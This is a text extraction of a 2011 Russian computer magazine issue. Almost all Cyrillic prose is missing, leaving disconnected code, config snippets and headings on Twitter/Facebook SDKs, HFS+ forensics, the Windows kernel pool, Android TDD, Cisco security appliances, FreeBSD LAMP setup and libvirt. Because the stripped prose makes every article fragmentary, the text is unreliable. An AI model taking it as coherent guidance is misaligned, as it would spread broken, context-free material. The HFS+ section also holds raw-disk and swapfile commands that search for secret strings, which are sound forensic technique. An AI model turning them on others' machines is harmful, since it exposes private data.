DropBox.
.
(. ).
, .

Twitter. , , ,
, . ,
.
, .

X 07 /150/ 2011
-
using TweetSharp;
// TwitterService
//
// -
TwitterService myTwitterService = new TwitterService();
IEnumerable<TwitterStatus> tweets =
myTwitterService.ListTweetsOnPublicTimeline();
// . /
foreach (var tweet in tweets)
{
Console.WriteLine("{0} "{1}"",
tweet.User.ScreenName, tweet.Text);
}
. - ,
.
TwitterSharp. ,
.NET (2-4), Mono 2.6, Windows
Phone 7. WP7 .
, .
Twitter-
. Twitter-Sharp
, , , OAuth,
. .
, , .
. , .
, .
, ,
, . ,
.
, .
SDK

. , ,
. ,
Alfa, .
, , Silverlight vkontakte
API (silverlightvkapi.codeplex.com).
( , ..).
, .
Flickr
Flickr ,
, Yahoo.
, .
,
. Wikipedia, .
,
CodePlex FlickrNET API Library
(flickrnet.codeplex.com). ,
Flickr .
, DVD.
X 07 /150/ 2011

sharpbox.codeplex.com/documentation , DropBox
SharpBox.
sharpbox.codeplex.com
DropBox.
tweetsharp.codeplex.com
tweetsharp.
shorturlcreator.codeplex.com
.
? .
svapi.codeplex.com SilverLight API Connector .
ggltranslate.codeplex.com Google.
vkontakte.ru/developers.php
.
www.vr-online.ru/page/vr-online-dekabr-yanvar-3171
VROnline ,
Google
. .
Facebook
Facebook ,
:). ,
, .
, Facebook SDK, .. CodePlex, Facebook
/
. . ,
. ,
Facebook # SDK (facebooksdk.codeplex.com) Facebook Developer
Tookit (facebooktoolkit.codeplex.com).
/web/Silverlight-,
Facebook.
Windows Phone 7, ,
must have!
, . ? , Facebook C# SDK, FDT
.
Facebook,
www.facebook.com/#!/developers/
application.
DropBox. , , .
. FDT,
. FDT
, ..
. .

. , , SDK . ,
,
.
, . . ! z
101
CODING
(seva@vingrad.ru)
Mac OS X
,

. ,
, Mac OS X
, .
Intro
Mac OS, Apple HFS (Hierarchical File System).

HFS+, Mac OS,
8.1. , HFS+,
HFS, .
:
102
HFS
31
Mac Roman
512
2^31
HFS+
255
Unicode
4 K
2^63
, HFS+ , X 07 /150/ 2011
HFS+

HFS+ . , , journalInfoBlock , ,
allocationFile-,
, catalogFile .
HFS+
HFS .
16 , ,
65536 ,
. ,
.
HFS+ 32 ,
.
HFS+
.
:
Volume header ( ).
. , .
Allocation file ( ). Bitmap,
. (1 , 0
.)
Catalog file ().
.
Extents overflow file. , .
Attributes file ( ). ..
Journal file (). , .
Catalog file, extents overflow file attribute file
B-.
1024 .
X 07 /150/ 2011
HFS+
struct HFSPlusVolumeHeader
{
UInt16
signature;
UInt16
version;
UInt32
attributes;
UInt32
lastMountedVersion;
UInt32
journalInfoBlock;
UInt32
createDate;
UInt32
modifyDate;
UInt32
backupDate;
UInt32
checkedDate;
UInt32
fileCount;
UInt32
folderCount;
UInt32
blockSize;
UInt32
totalBlocks;
UInt32
freeBlocks;
UInt32
nextAllocation;
UInt32
rsrcClumpSize;
UInt32
dataClumpSize;
HFSCatalogNodeID
nextCatalogID;
UInt32
writeCount;
UInt64
encodingsBitmap;
UInt32
finderInfo[8];
HFSPlusForkData
allocationFile;
HFSPlusForkData
extentsFile;
HFSPlusForkData
catalogFile;
HFSPlusForkData
attributesFile;
HFSPlusForkData
startupFile;
};
catalog file
struct HFSPlusCatalogFile
{
SInt16 recordType;
UInt16 flags;
UInt32 reserved1;
HFSCatalogNodeID fileID;
UInt32 createDate;
UInt32 contentModDate;
UInt32 attributeModDate;
UInt32 accessDate;
UInt32 backupDate;
HFSPlusPermissions permissions;
FInfo userInfo;
FXInfo finderInfo;
UInt32 textEncoding;UInt32 reserved2;
HFSPlusForkData dataFork;
HFSPlusForkData resourceFork;
};
Catalog file
. Node ID (CNID)
. catalog file
,

103
CODING
Time Machine
(fork). , Extent overflow file.
fork-
struct HFSPlusForkData
{
UInt64 logicalSize;
UInt32 clumpSize;
UInt32 totalBlocks;
HFSPlusExtentRecord extents;
};
HFS+ , .
, , HFS+.

. ,
. , , HFS+,
Apple.
MacOS HFS HFS+

, ,
. - ,
HFS+ B-
. - ,
B- , . Mac OS X 10.2 2002
Apple HFS+, ,
104
.
. Mac OS X 10.2
. Mac OS X 10.3
. ,
Mac OS X .
HFS+
, .
. ,
, , :
Catalog file .
Bitmap ,
.
Extent overflow, .
.
, .
,
,
. .
HFS+ :
1. .
2. .
3. .
4. .
5. .
HFS+
.
, .
X 07 /150/ 2011
-
!

? :
1.
2. Catalog File
3.
4.
5.
6. , ( Bitmap),
.
,
. Mac-mini
5-10 . MacBook'
30 . Time Machine, 20 . ,
.
:
mkdir /Volumes/MyVolume
mount -t hfs -r /dev/diskXXXX /Volumes/MyVolume

, bitmap'
.
HFS+ ,
,
.
, . HFS+, ,
dd, ,
. , ,
:).
:
sudo dd if=/dev/disk1 of=./evidence bs=4096 \
skip=4355500 count=1
- ,
, , :
sudo cat /dev/disk1 | strings -o | grep -i \
'secret code' -C 5
,
.
, , , shred,
, .
Mac OS X /var/vm
$ ls -al /var/vm
total 131072
drwxr-xr-x 4 root wheel 136 Oct 14 10:50 .
drwxr-xr-x 24 root wheel 816 Oct 14 10:52 ..
drwx--x--x 18 root wheel 612 Oct 11 11:20 app_profile
-rw------T 1 root wheel 67108864 Oct 14 10:50 swapfile
, :
sudo strings -o /var/vm/swapfile | grep 'secret code' -C 2
X 07 /150/ 2011
,
.

raw-. , /dev/rdisk0s1 EFI , HFS+ /dev/
rdisk0s2. , hfs/hfs_format.h
HFS+, .
#import <hfs/hfs_format.h>
#import <util.h>
void dump(unsigned char * buf, size_t len)
{
for (size_t i = 0; i < len; ++i)
printf("%02X ", buf[i]);
}
int main(int argc, char *argv[])
{
//
// devopen
int fd = open("/dev/rdisk0s2", O_RDONLY );
// hfs_format.h
HFSPlusVolumeHeader volume_header;
// 1024
int rd = pread(fd, &volume_header,
sizeof(volume_header), 0x400);
//
//
printf("%u\n", volume_header.blockSize);
dump((char*)&volume_header, sizeof(volume_header));
//
close(fd);
}
, raw-,
sudo, .
Time Machine
Mac OS X Leopard, Time

Machine. ,
, . ,
,
.
Time Machine .
Apple Apple Time Capsule,

Time Machine. Time Machine
USB eSata-. Time Machine
, .
Time Machine .
, Time Machine, .
Outro
.
, ,
, . z
105
CODING
(stannic.man@gmail.com)
Windows? ,
, . , - ,
. ,
. .
, .
,
? , . - , ,
, PDE/
PTE- , ,
.
, , ArtMoney
.
? ,
? , . :).
Windows
, , .
, , .
106
, , , Windows API, . Windows ,

. Intel x86,
4096 . , / Windows
(ExAllocatePoolWithTag ExFreePoolWithTag),

. , .
.
Windows

Windows, -
X 07 /150/ 2011
1. WinDBG PCRB
(paged) (nonpaged).
, ,
,

pagefile.sys. , , paged- .
Nonpaged-
.

. ,
nonpaged
.

, .
][
Windows. ,
.
,
Windows
,
.

.
,
.

,
, .
,
,
X 07 /150/ 2011
,
,
.

.
.
, PPNPagedLookasideList (LookasideList),

nonpaged- <= 256
. PCR
(processor control
register), ,
IRQL, GDT, IDT .. , PCRB (processor control region),
(. . 1).
Windows Semerka KPRCB , , , KPRCB
:
HTTP://WWW
links
hackinthebox.org

.
typedef struct _KPRCB {

...
/*0x5A0*/ struct
_PP_LOOKASIDE_LIST PPLookasideList[16];
/*0x620*/ struct _GENERAL_LOOKASIDE_POOL
PPNPagedLookasideList[32];
/*0xF20*/ struct _GENERAL_LOOKASIDE_POOL
PPPagedLookasideList[32];
...
} KPRCB, *PKPRCB;
107
CODING
2.
MmNonPagedPoolFreeListHead
,

.

ExInterlockedPopEntrySList.
, , .
,
<= 4080 . , .
, POOL_DESCRIPTOR:
typedef struct _POOL_DESCRIPTOR
{
enum _POOL_TYPE PoolType;
union {
struct _KGUARDED_MUTEX PagedLock;
ULONG32 NonPagedLock;
};
LONG32 RunningAllocs;
LONG32 RunningDeAllocs;
LONG32 TotalBigPages;
LONG32 ThreadsProcessingDeferrals;
ULONG32 TotalBytes;
UINT8 _PADDING0_[0x2C];
ULONG32 PoolIndex;
LONG32 TotalPages;
VOID** PendingFrees;
LONG32 PendingFreeDepth;
UINT8 _PADDING3_[0x38];
struct _LIST_ENTRY ListHeads[512];
} POOL_DESCRIPTOR, *PPOOL_DESCRIPTOR;
, PoolVector
NonPagedPoolDescriptor.
108
,
ExpNonPagedPoolDescriptor, 16 ,
.
PRCB KNODE,
,
ExpNonPagedPoolDescriptor.
,
MmNonPagedPoolFreeListHead, , ,
4080 . , .
LIST_ENTRY,
, , ( ) ,
.
,
LockQueueNonPagedPoolLock.
ExFreePoolWithTag
,
MmNonPagedPoolFreeListHead .
, , . ,
,
:). , , .
...
, .
, ,
, .
,

. . ,
, Windows Vista/7 .
.
: ,
,
!
(. . 2).
() Windows. , Next Lookaside, PoolOverflow () PendingFrees
( ) ..
, .
,
.
, , , , ...
, , ,
, .
, ,
. ,
Windows
,
.
! z
X 07 /150/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! ,
.
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
CODING
RankoR (rankor777@gmail.com, ax-host.ru)
,
: TDD Android
( , )
, . ,
.

20%- 80% . , . ,
, ,
1. ,

(, , ).
.
- (. 1),
, , ,
, -
.

.
, . , .
(. unit testing) , , ,
.
, , , . ,
int32,
,
.
, .
, TDD (. Test Driven Development),
.
, (
) , TDD
, . TDD
2. ,
, , , ,
.
110
1.
test case
.
.
,
test case 1-2 .
,
.

,

X 07 /150/ 2011
2. TDD
, .
5. .
, . ,
, ,
, ,
. ,
,
,
.

, ,
TDD: ,
- , .
:
1. - (
). ,
,
.
2. . ,
boolean,
return false (
,
true), , .
, .
3. ,

. , .
4. , .
X 07 /150/ 2011
( ) Android.
Android, , Java.

, ,
DVD
true false. , , ,
, 1, 2, 3 ..
dvd
, -

.
( Android (,
, , )
, Eclipse, ADT Android SDK)
. ,
Next
Create a test project.
INFO
.
Java- -
JUnit. JUnit Android SDK, info
, Android .

Wikipedia
.
TestSuite ( ), TestCase .
,
().
111
CODING
,
test, JUnit , , :).
, <Ctrl> + <F11>.
, Matrix
orderIsRight().
, : return false. ,
: ,
. ,
(, , ) .
orderIsRight() :
public static boolean orderIsRight(
final List<Point> pPoints) {
Point firstPoint = pPoints.get(0);
for (int i = 1; i < pPoints.size(); i++) {
final Point secondPoint = pPoints.get(i);
if (pointsAreInWrongOrder(firstPoint,
secondPoint)) {
return false;
}
firstPoint = secondPoint;
}
return true;
}
pointsAreInWrongOrder() ,
:
return (pFirstPoint.x >= pSecondPoint.x);
, true, , ( ).
. ,
.
.
Android
,
.
public void testValidOrder() {
List<Point> points = new ArrayList<Point>();
points.add(new Point(0, 0));
boolean result = Matrix.orderIsRight(points);
assertTrue(result);
}
public void testInvalidOrder() {
List<Point> points = new ArrayList<Point>();
boolean result = Matrix.orderIsRight(points);
assertFalse(result);
}
112
GUI
.
GUI , , ,
. GUI ,
,
. ,
, . ,
, , , ,
, .
Android SDK
, ActivityInstrumentationTestCa
se2.
GUI. , ActivityInstrumentationTest
Case2 , ..
class MainActivityTest extends ActivityInstrumentationTestCase2<Mai
nActivity>.
Activity (MainActivity),
. , .
Android 2.3.4 Wi-Fi.
, Wi-Fi
, , . X 07 /150/ 2011

, Adb over
Wi-Fi Android Market (
root). . ,
:
GUI
adb connect 192.168.1.5:31337
GUI ,
. , setUp(),
. , Activity,
:
private
private
private
private
Activity
EditText
EditText
EditText
mActivity;
mEditText1;
mEditText2;
mEditText3;
:
protected void setUp() throws Exception {
super.setUp();
mActivity = getActivity();
mEditText1 = (EditText)mActivity.findViewById
(com.example.matrix.R.id.editTextLine1);
<...>
mTextView = (Button)mActivity.findViewById(
com.example.matrix.R.id.textView);
}
, :
public void testControlsCreated() {
assertNotNull(mActivity);
assertNotNull(mEditText1);
<...>
assertNotNull(mTextView);
}
,
, , , - - .
,
textView (OK NOT OK).
X 07 /150/ 2011
:
public void testValidData() {
TouchUtils.tapView(this, mEditText1);
sendKeys(KeyEvent.KEYCODE_0, KeyEvent.KEYCODE_SPACE,
KeyEvent.KEYCODE_0);
assertEquals("OK", mTextView.getText());
}
, . EditText
. -
, , . , -
, ,
:).
,
, Activity ( Activity ) :).
, .
Java Android
JUnit, .
, ,
, ,
,
. z
113
SYN/ACK
grinder (grinder@tux.in.ua)
CISCO

. .
-, VPN; ,
. ,
Cisco, .
IronPort
Cisco , ,
.
.
, , ,
. , ,
.
-,
. , ,
, .
,
.
, , ,
SaaS .
, .
. Cisco Cisco IronPort Systems LLC
(ironport.com), - ,
-,
. IronPort .
E-mail Security Appliance
( C-Series X-Series, - Web Security
Appliance (S-Series). M-Series.
,
, . M-Series
,
. IronPort .
(,
FTP-).
, WCCPv2 (Web Cache
Communication Protocol). . IronPort
AsyncOS, FreeBSD-

.
10000 ,
DOS-. AsyncOS -
114
- (Unix Shell ).
,
, (FTP, HTTP(S)).
IronPort
SensorBase. ,
SenderBase .

, SensorBase .
Risk Rating. . Cisco, ,
, ,
30% ,

. IP-
-10 +10. . , ,
200 . , IP-
, IronPort
. ,
(malware, , ..).
, 80%
-
, .
. , , -
Waledac ,
, IronPort, . ,
, SpamAssassin, ,
. IronPort
Risk Rating (,
..), ,
. ,
: , :).
, SensorBase .
, ,
, SensorBase IP-.
, IronPort :
- Anti-Spam Filters CASE
(Context Adaptive Scanning Engine, ), ;
;
- (Cisco IronPort URL Filters),

80- ;
X 07 /150/ 2011
CISCO
Cisco,
. .
eBay
$100 (),
. , ,
, . .
!
Cisco Packet
Tracer (cisco.com/web/learning/netacad/course_catalog/PacketTracer.html),
. PT

.
Cisco (,
, , VPN ..), ,
, .
,
Cisco, RT
.
Packet Tracert Windows XP-7
Linux.
RT Dynamips (ipflow.
utc.fr/index.php/Cisco_7200_Simulator) GNS3 (gns3.net).
(IronPort Virus
Outbreak Filters), ,
(Sophos, McAffee);
IronPort, ;
DLP-,
( ).
,
. , IM, Skype, -.
;
- ;
X 07 /150/ 2011
- ( URL, HTTP-
, IronPort
).
-
.
, ,
. IronPort
- .
LDAP-, Active
Directory. IronPort , ,
. Reputation Filter,
DLP
. , .
, IronPort
.
. , ironport.com/try,
.
ASA 5500
,
Cisco, Cisco ASA 5500
Series, (ASA Adaptive Security Appliances),
PIX. ASA 5500
Cisco SDN (Self Defending
Networks, bit.ly/kKmBD5). ASA 5500 , , Adaptive Threat Defense,
.
, VPN
( SSL IPsec), IPS ( ),
URL -,
,
, , Anti-X (
). , , ASA 5500
, .
5500. 2-7
115
SYN/ACK
Cisco
MARS
eBay Cisco
Cisco ASA 5505

, IM P2P, , . ,

.
. , ,
,
,
( 80). ASA 5500
. Cisco SSL VPN Cisco AnyConnect Cisco Secure Desktop (CSD).
CSD ,
, .

, , , IP-,
. VPN
, LAN (CIFS, HTTP/S, FTP).
, .
VM. .
QoS, , IPv6 , ASA 5500 .
ASA 5500 ,
,
, , DMZ. firewall
, ASA 5500 .
, , (
enterprise-),
, .
, Cisco ASA 5505
Base Security Plus, -
116
10000 25000 , 10 25
2 VPN, . ,
eBay / ASA 5505 $150,
.
, VPN, GTP/GPRS . VPN-, , ,
ASA 5520
750.
5500 . ,
OpenSource- (Squid, HAVP, SquidGuard, ClamAV, OpenDPI,
OpenVPN ), ,
, . , ,
.
, .
, ?
, ,
( Cisco
? - ! . .).
Cisco
,
. ,
, - .
, .
ASA 5500 Series (, , )
, . ,
, AIP-SSM (Advanced Inspection and Prevention Security
Services Module) CSC-SSM (Content Security and Control Security
Services Module). Cisco
, .
Cisco MARS
SDN Cisco MARS (Monitoring Analysis and Response

System). ( Cisco
NetFlow), . ,
, .
, Cisco ISS
RealSecure Network, McAfee IntruShield/Entercept HIDS, Juniper IDP,
Snort .
X 07 /150/ 2011
Cisco
Cisco Configuration Professional
Cisco Packet Tracert

Cisco GNS3
.

(Qualys Guard ANY, E-Eye, Retina Scanner Vulnerability
CVE).

.
,
.
,
, .
, , .
150 . e-mail, , SNMP.
, , firewall, IDS/IPS ..
X 07 /150/ 2011
,
, .
, MARS
. , Cisco end-of-life , 2011 .
2015 . MARS
, Cisco Security
Manager.
Cisco , , ,
. , ,
*nix,
. z
117
SYN/ACK
(execbit.ru)
Clipboard blocked!
Clipboard blocked!
Apache, MySQL PHP, LAMP,

Linux.
FreeBSD .
,
, FreeBSD (L)AMP
,
.
1. FreeBSD
. FreeBSD (www.freebsd.org), Get

FreeBSD Now, ( : 8.2-RELEASE 7.4-RELEASE), (amd64 i386), [ISO]
. : bootonly
, disk1 ISO CD, dvd1
DVD, livefs LiveCD , memstick
USB-.
, DHCP-, (DVD-
, CD ).
, ISO-, , / . .

sysinstall,
. : Express,
,
, . , <Enter>.
.
<A> , <C>,
. , ,
FreeBSD
DOS- ( FreeBSD ) BSD-,
.
<Q>, .
: ,
<Enter> MBR.
BSD-.
,
<A> . <Q>,
.
: .
CD/DVD, <Enter>. <Enter> .
,
. <Enter>, <X>, Yes
<Enter>. . ,
.
root .
118
2.
FreeBSD, ,
: , root , . .
-, root :
# passwd
.
,
SSH.
adduser:
# adduser
,
( <Enter>),
, (
tcsh) . ,
yes ( ),
no.
root,
wheel:
# pw groupmod wheel -m _
/etc/fstab , ,
/tmp /var.
noexec Options ( ).
:
#
#
#
#
#
chmod
chmod
chmod
chmod
chmod
0600
0600
0600
0600
0600
/etc/syslog.conf
/etc/rc.conf
/etc/newsyslog.conf
/etc/hosts.allow
/etc/login.conf
. FreeBSD
/etc/rc.conf, :
# ee /etc/rc.conf
hostname="host.com"
ifconfig_em0="inet 1.2.3.4 netmask 0xffffffff"
defaultrouter="5.6.7.8"
em0
.
ifconfig.
X 07 /150/ 2011
DHCP, dhclient.
:
# ee /etc/rc.conf
#
#
icmp_drop_redirect="YES"
icmp_log_redirect="YES"
# /etc/rc.d/netif retstart
:
# ping execbit.ru
/etc/sysctl.conf:
# ping-
icmp_bmcastecho="NO"
#
#
#
#
# /tmp
clear_tmp_enable="YES"
net.inet.tcp.blackhole=2
net.inet.udp.blackhole=1
# /etc/motd
update_motd="NO"
# root
kern.ps_showallprocs=0
#
# SYN FIN
tcp_drop_synfin="YES"
# sendmail
sendmail_enable="NO"
sendmail_submit_enable="NO"
# SSH
sshd_enable="YES"
, <Esc> <A>.
DNS- /etc/resolv.conf:
# ee /etc/resolv.conf
nameserver 8.8.8.8
,
:
X 07 /150/ 2011
ee /etc/sysctl.conf

( DoS-
)
SSH- -:
# echo "MaxStartups 5:50:10" >> /etc/ssh/sshd_config
# /etc/rc.d/sshd restart
SSH- 50%
, .
, .
-, ( )
FreeBSD ,
( , ,
):
# portsnap fetch extract
, :
119
SYN/ACK
Webmin
# freebsd-update fetch
# freebsd-update install
# shutdown -r now
, rkhunter, ,
:
# cd /usr/ports/security/rkhunter
# make install clean
/usr/local/etc/rkhunter.
conf , MAIL-ON-WARNING email,
.
:
# rkhunter --update
,
:
# crontab -e
0 2 * * * root
/usr/local/sbin/ntpdate
pool.ntp.org
, Webmin, web-
(,
SSH, ):
# cd /usr/ports/sysutils/webmin
# echo 'webmin_enable="YES"' >> /etc/rc.conf
Webmin:
# /usr/local/lib/webmin/setup.sh
<Enter>,
( Login password:), Webmin (,
). Webmin:
# /usr/local/etc/rc.d/webmin start
# rkhunter --propupd
/etc/periodic.conf ,

:
# echo 'daily_rkhunter_update_enable="YES"' > \
/etc/periodic.conf
# echo 'daily_rkhunter_check_enable="YES"' > \
/etc/periodic.conf
, /var/log/rkhunter.log
email.
cron
:
120
, https://host.com:10000/
.
AMP
AMP, -
Apache, MySQL PHP.
Apache. :
# cd /usr/ports/www/apache22
# make config install clean
,

. - ,
<Enter>.
X 07 /150/ 2011
/tmp /var
( SSL ,
):
# echo 'apache22_enable="YES"' >> /etc/rc.conf
# echo 'apache22ssl_enable="YES"' >> /etc/rc.conf

accf_http, HTTP, SYN-:
# echo 'accf_http_ready="YES"' >> /etc/rc.conf
# kldload accf_http
PHP :
# cd /usr/ports/lang/php5
, Build Apache module .

:
FreeBSD
# mkdir /home/www/cgi-bin
/
home/www , -, /home
( ,
, /home
), -, , /usr/local/www/apache22/data,
.
4. :
<Directory /usr/local/www/apache22/data>
,
DocumentRoot:
<Directory /home/www/data>
5. :
<ifModule dir_module>
# cd /usr/ports/lang/php5-extensions
, PHP MySQL database support,

PHP MySQL.
.
Apache
( FreeBSD : /usr/local/etc/apache22/
httpd.conf) :
1. LoadModule :
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps
2. ServerAdmin :
ServerAdmin me@site.com
3. DocumentRoot , -:
DirectoryIndex index.html
</ifModule>
:
<ifModule dir_module>
DirectoryIndex index.php index.html
</ifModule>
6. <ifModule alias_module> :
ScriptAlias /cgi-bin/ "/usr/local/www/apache22/cgi-bin/"
:
ScriptAlias /cgi-bin/ "/home/www/cgi-bin/"
7. :
<Directory "/usr/local/www/apache22/cgi-bin">
:
DocumentRoot "/home/www/data"
<Directory "/home/www/cgi-bin">
PHP:
# mkdir /home/www
# mkdir /home/www/data
X 07 /150/ 2011
# cp /usr/local/etc/php.ini-recommended /usr/local/etc/php.ini
121
SYN/ACK

Apache
PHP. MySQL.
:
# cd /usr/ports/databases/mysql50-server
# make WITH_OPENSSL=yes install clean
,
:
# ee /etc/my.cnf
[client]
port=29912
[mysqld]
port=29912
bind-address=127.0.0.1
PHPMyAdmin,
web-:
# cd /usr/local/www/phpMyAdmin
# cp config.sample.inc.php config.inc.php
# ee config.inc.php
$cfg['blowfish_secret'] = '';
Apache
:
1. <IfModule alias_module> :
Alias /phpmyadmin /usr/local/www/phpMyAdmin
2. <Directory> :
MySQL :
# echo 'mysql_enable="YES"' << /etc/rc.conf
# /usr/local/etc/rc.d/mysql-server start
:
# mysqladmin -u root password
# mysql -u root -p
MySQL ,
, ,
MySQL,
- . - MySQL
PHPMyAdmin:
# cd /usr/ports/databases/phpmyadmin
122
<Directory "/usr/local/www/phpMyAdmin">
Order allow,deny
Allow from all
</Directory>
Allow from all - Allow

from 123.456.789.0/12, PHPMyAdmin
.
Apache:
# /usr/local/etc/rc.d/apache22 restart
, (L)AMP .
HTTPS
PHPMyAdmin HTTPS,
X 07 /150/ 2011
Apache PHP
,
. , Apache
.
OpenSSL (/etc/ssl/
openssl.cnf), :
#
dir = /root/sslCA
# (~10 )
default_days = 3650

:
#
#
#
#
#
#
#
cd /root
mkdir sslCA
chmod 700 sslCA
chmod 700 sslCA
mkdir private
cd sslCA
openssl req -new -x509 -days 3650 -extensions v3_ca \
-keyout private/cakey.pem -out cacert.pem \
-config /etc/ssl/openssl.cnf
, :
# ls -l cacert.pem private/cakey.pem
Apache /etc/
ssl:
# cd /root/sslCA
# openssl req -new -nodes -out _-req.pem \
-keyout private/_-key.pem -config /etc/ssl/openssl.cnf
# openssl ca -config /etc/ssl/openssl.cnf -out \
_-cert.pem -infiles _-req.pem
X 07 /150/ 2011
# cp /root/sslCA/_-cert.pem /etc/ssl/crt
# cp /root/sslCA/private/_-key.pem /etc/ssl/key
Apache, :
# ee /usr/local/etc/apache22/httpd.conf
#Include etc/apache22/extra/httpd-ssl.conf
/usr/local/etc/apache22/extra/
http-ssl.conf:
# ee /usr/local/etc/apache22/extra/http-ssl.conf
# HTTPS-
ServerName ssl.host.com
# ,
SSLCertificateFile /etc/ssl/crt/yourhostname-cert.pem
SSLCertificateKeyFile /etc/ssl/key/yourhostname-key.pem
# ,
DocumentRoot "/home/www/data"
#
ErrorLog "/var/log/httpd-error.log"
TransferLog "/var/log/httpd-access.log"
Apache:
# /usr/local/etc/rc.d/apache22 restart
,
(L)AMP FreeBSD ( FAMP), ,
,
/home/www/data ( /home/www/cgi-bin).
(L)AMP. z
123
SYN/ACK
(execbit.ru)

QEMU, KVM, ,
,
. , .
, KVM QEMU ,
,
. QEMU

.
KVM , .
,
,
.
QEMU+KVM
,

QEMU.
virsh
virt-install,
- ,
virsh,
(, , libvirt,
):
, QEMU+KVM.
,
,
. ,
libvirt.
Libvirt ,
. ,
libvirt, , -,
,
. -, libvirt , KVM Xen
VMware OpenVZ. ,
,
( , , libvirt,
).
-, libvirt ,
, -
, .
, libvirt,
.
124
virsh libvirt.
,
. ,
,
libvirt,
, virsh .
virsh libvirt,

( KVM, QEMU, dnsmasq bridge-utils).
,
( Ubuntu):
$ sudo apt-get install bridge-utils dnsmasq kvm \
qemu libvirt libvirt-bin
$ sudo apt-get install virtinst
virsh ,
libvirtd.

, (, ArchLinux)
. , libvirtd :
$ ps ax | grep libvirtd
, (
init.d rc.d):
$ sudo /etc/init.d/libvirtd start
:
$ sudo virsh --connect qemu:///system version
$ sudo virsh --connect qemu:///system list
X 07 /150/ 2011
virt-install
ACPI
virt-install .
,
, '-d',

~/.virtinst/virt-install.log.

ACPI,
QEMU. ,
'--noacpi' '--noapic'
( ) virt-install.
INFO
info

:
sudo virsh attach-disk
,
:
: libvir 0.9.0
: libvir 0.9.0
API: QEMU 0.9.0
: QEMU 0.14.0
.
virsh '--connect'
(sudo virsh version), libvirt
.
,
'--connect'. libvirt

SSH-. ( '-c' '--connect'):
$ virsh -c \
qemu+ssh://root@host.com/system
. ,
, virsh.
, , , .

virt-install :
X 07 /150/ 2011
$ sudo virt-install --connect qemu:///system \

--name vm1 \
--ram 512 \
--vnc \
--os-type linux
--os-variant ubuntumaverick \
--accelerate \
--network=network:default \
--disk \
path=/var/lib/libvirt/images/vm1.img,size=5 \
--cdrom /tmp/ubuntu-10.10-server-i386.iso \
--noautoconsole
--driver file --type

cdrom --mode readonly
/var/lib/libvirt/
images/cdrom.iso sdc

:
# virsh dumpxml vm1 >
~/vm1.xml
# vi vm1.xml
# virsh create vm1.xml

QEMU.
vm1 ( '--name'), 512
('--ram'),
VNC- ( ,
).

Linux ('--os-type linux')
Ubuntu 10.10 ('--os-variant
ubuntumaverick'),
('--accelerate').
'network' .
:
1. bridge:_
125
SYN/ACK
virt-manager

Ubuntu
1. /etc/network/interfaces,
(
IP-, ):
auto lo
iface lo inet loopback
auto br0
iface br0 inet static
address 192.168.0.10
network 192.168.0.0
netmask 255.255.255.0
broadcast 192.168.0.255
gateway 192.168.0.1
bridge_ports eth0
bridge_fd 9
bridge_hello 2
bridge_maxage 12
bridge_stp off
2. :
$ sudo /etc/init.d/networking restart
3. dhcdbd:
$ sudo /etc/init.d/dhcdbd stop
$ sudo update-rc.d -f dhcdbd remove
.
. ,
( Ubuntu).
2. network:_
. ,
, NAT. ,
, - .
_ /var/lib/
libvirt/network, xml.
, :
# virsh net-list --all
126
virt-df
3. user , SLIRP.
,
.
'--disk' libvirt
, .
,
'size'. 'sparse', ,
(sparse=true, )
(sparse=false).
,
, 'size'.
. ,
, -,
, -,
.
/var/
lib/libvirt/images LVM- ( NFS
POHMELFS, ). ,
.
'--cdrom'
ISO-. ,
/tmp .
,
ISO-:
--cdrom ftp://host.com/images/ubuntu/
, initrd,
:
--location http://ftp.us.debian.org/debian/dists/etch/
main/installer-amd64/
, , . X 07 /150/ 2011
virt-manager
('--noautoconsole')
. 'vcpus'
'cpuset',

( , ).
, /etc/libvirt/qemu/vm1.xml
.

'virsh list'. , .
.
,
virt-viewer,
:
$ sudo apt-get install
$ virt-viewer -c qemu:///system test
X 07 /150/ 2011
, virt-install
. ,
, , , .

,
'console vm1',
'dominfo vm1', - (
libvirtd) 'autostart
vm1', ( 'save'),
('resume '), ('shutdown'), ('start'),
('destroy'),
('attach-device'),
,
:
WARNING
warning
SeLinux,
Fedora
,

,
/var/lib/libvirt/
images.
$ sudo virt-clone \
--connect=qemu:///system -o vm1 -n vm2

vm2,
127
SYN/ACK
virt-manager
vm1, .
'virt-clone' , , .

, libvirt-
:
$ sudo virsh migrate --live vm136 \
qemu+ssh://host2.com/system
:
$ sudo virsh qemu+ssh://host2.com/system list
virsh
, , GUI web-,
. virt-manager,
.
virt-manager
virt-manager (virt-manager.org)
, ,
virt-install, virt-clone virt-viewer.
, Red Hat,
libvirt. , - ,
.
virt-manager
( ) , , (,
QEMU)
.

, , , , ,
128
( ).
, virt-install.
,
, ,
(, ACPI NetBSD)
.
.
, , .
.

,
, (
, , , ),
, , /
.

( ,
)
.
. libvirt.org/apps.html ,
libvirt . , :
virt-top (people.redhat.com/~rjones/virt-top) TOP-
.
top.
virt-df (people.redhat.com/~rjones/virt-df) df,

.
X 07 /150/ 2011
vnc-viewer
virt-p2v (people.redhat.com/~rjones/virt-p2v)
.
virt-v2v (git.fedorahosted.org/git/?p=virt-v2v.git;a=summary)
,
, qemu-kvm.
Web-
Web- Karesansui,
2.0.
Web2.0- ,
virt-manager.
, , Web-
.
Karesansui Python-
SQLite Java- tightVNC-java,
, VNC libvirtd. web-
jQuery.
,
Archipel (archipelproject.org), Jabber-,
,
IM-, , ,
.
,
- .
jabber-.
, ,
X 07 /150/ 2011
, ,
Jabber- 2000

, .
, XMPP, Archipel
Web-,
, .
Karesansui.
:
;
Archipel;

;
;
,
XMPP S2S.
libvirt. , , Amazon EC2
Eucalyptus (open.eucalyptus.com) OpenStack (openstack.org),

OpenNode (opennode.activesys.org)
Adobe Flex Sun/Oracle Java AbiCloud (community.abiquo.
com).
Linux ,
.
QEMU KVM, ,
. z
129
PHREAKING
(po@kumekay.com)
RGB-
KINECT:

Kinect Xbox 360

. 2010 ,
:
2 10 . ,
PC, !
Kinect , . ,
xbox-zone.ru, ,
ifixit.com
, . , Kinecta :
1. RGB-,
-: 640x480 30
.
2. , .
130
3. , , .
4.
.
5. , .
6. PrimeSensor ,
-, 3D-.
Kinect, ,
, .
X 07 /150/ 2011
Faast
xbox,
, USB ,
12 (
).
